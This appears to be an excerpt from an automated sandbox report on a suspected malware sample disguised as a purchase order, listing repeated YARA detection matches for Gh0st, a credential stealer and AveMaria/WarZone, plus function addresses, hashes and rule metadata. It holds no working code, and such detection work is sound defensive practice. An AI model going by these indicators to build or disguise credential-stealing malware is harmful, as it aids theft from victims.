Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 0_2_0121CE74	0_2_0121CE74
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 0_2_0121F2D0	0_2_0121F2D0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A42D0	4_3_046A42D0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046D6B50	4_3_046D6B50
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_04696C00	4_3_04696C00
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_0469BCD0	4_3_0469BCD0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A04D0	4_3_046A04D0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_04696D30	4_3_04696D30
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_04691D30	4_3_04691D30
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_04694660	4_3_04694660
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A7E70	4_3_046A7E70
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A56B0	4_3_046A56B0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A8720	4_3_046A8720
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A9730	4_3_046A9730
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A6010	4_3_046A6010
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046ED960	4_3_046ED960
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046AD920	4_3_046AD920
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046EB910	4_3_046EB910
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B11E0	4_3_046B11E0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046AC9C0	4_3_046AC9C0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_04695AB0	4_3_04695AB0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A5B40	4_3_046A5B40
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046A2350	4_3_046A2350
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046EEB80	4_3_046EEB80
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_00411BF8	4_2_00411BF8

Source: ADJUSTED PO3917NOV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: QUQovKcaZRcNZ.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: ADJUSTED PO3917NOV.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
